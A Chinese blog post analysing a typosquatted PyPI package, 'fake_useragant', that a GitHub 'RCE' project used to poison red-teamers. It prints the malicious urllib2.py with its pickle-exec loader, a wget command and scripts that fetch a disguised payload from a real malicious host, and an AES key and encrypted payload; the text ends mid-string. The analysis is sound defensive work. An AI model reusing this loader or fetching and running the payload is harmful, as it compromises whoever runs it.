今天是某活动的第一天,上微步在线和各个群里康康在讨论啥。发现位于github的一个据称捕获了攻击队0day的名为360tianqingRCE的项目被爆出为红队的供应链攻击,于是顺着群内大佬的脚步我也分析了一下,以下为我个人和参考群里的讨论溯源分析的结果。
Snipaste_2022-07-26_02-57-16.png

0x01 PyPI库代码污染

由于有大佬指出了问题所在,所以直接看该项目代码发现,在第5行导入了from fake_useragant import UserAgent的python库,正常伪造UA的库名字为fake_useragent,而供应链投毒的库名为fake_useragant,攻击者把字母e改为了a。
通常运行python脚本提示库缺少的时候,我们都是利用pip install xxx来导入需要的库,而执行pip动作实际上是从PyPI网站上下载所需要的库。于是在PyPI官网找到了攻击者上传的fake_useragant恶意代码库,时间为最近几天上传的。

微步大佬发言.png
PyPI上被攻击者上传的恶意代码库.png

0x02 下载恶意代码

笔者进行下载的时候,发现PyPI官网的假库已经被删除了,无法再从官网下载,好在群内小伙伴提示可以从清华PyPI镜像源下载,因为镜像源24小时同步一次的机制,所以PyPI上删除了,镜像站可能要等一天后才能被删除。

pip3 install --target=./ fake_useragant -i https://pypi.tuna.tsinghua.edu.cn/simple #下载恶意代码到当前目录

0x03 urllib2.py恶意文件分析

通过将库内文件逐个点开看,不难发现urlli2.py文件中base64.decodebytes后面括号里的异常,通常为恶意代码的所在,所以将括号里的字符串base64解码。这里的json并不是常用的json,而是使用import pickle as json,使用了pickle的反序列化操作。

# -*- coding:utf-8 -*-
import base64
import ctypes
import pickle as json
import urllib.request
from Crypto.Cipher import AES

def task(pid):
    import time 
    os.system(f'>nul 2>nul taskkill /F /PID {pid}')
    urllib2.urlparse()

def urlparse():
    json.loads(base64.decodebytes(b'gASVpwAAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlIyLaHRtbD11cmxsaWIucmVxdWVzdC51cmxvcGVuKCdodHRwOi8vaS5taWFvc3UuYmlkL2RhdGEvZl8yMDEzMzU3Mi5wbmcnKS5yZWFkKClbNzpdCmpzb24ubG9hZHMoYmFzZTY0LmRlY29kZWJ5dGVzKGh0bWxbOi0zXVs6Oi0xXStodG1sWy0zOl0pKZSFlFKULg=='))

括号里的字符串base64解码得到exec
html=urllib.request.urlopen('http://i.miaosu.bid/data/f_20133572.png').read()[7:]json.loads(base64.decodebytes(html[:-3][::-1]+html[-3:]))字样,说明代码使用exec执行后面的操作。

这里发现恶意代码向外网站请求访问了一张png图片,然后再对图片里的数据进行处理进而执行。这里可以使用wget http://i.miaosu.bid/data/f_20133572.png命令把图片下载下来,可以发现这是一个文件头伪造为图片格式,但内容完全完全是字符串的文件。
伪造为图片格式的恶意字符串文件.png

0x04 列表切片拼接伪造图片文件数据

顺着攻击者的代码,可以拼接一下base64.decodebytes的数据,拼接代码如下。跟剥笋一样,打印出base64解密的结果,又得到一个新的恶意代码。

    import base64
    import urllib.request

    html=urllib.request.urlopen('http://i.miaosu.bid/data/f_20133572.png').read()[7:]
    print (base64.decodebytes(html[:-3][::-1]+html[-3:]))

对恶意图片文件处理后得到的代码.png

0x05 恶意代码AES解密

通过第4小节对图片文件处理得到了一个需要AES解密的恶意代码,于是又顺着攻击者的代码编写一下脚本处理AES解密,代码如下。

# -*- coding:utf-8 -*-
import base64
from Crypto.Cipher import AES

print (base64.decodebytes(AES.new(b'jyWDR74uVcdaOAg5CnvZM8ltHsP2YEi=',AES.MODE_CBC,b'8mZkouHI9ngWzQx3').decrypt(base64.decodebytes(b'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'+b'='*(len(b'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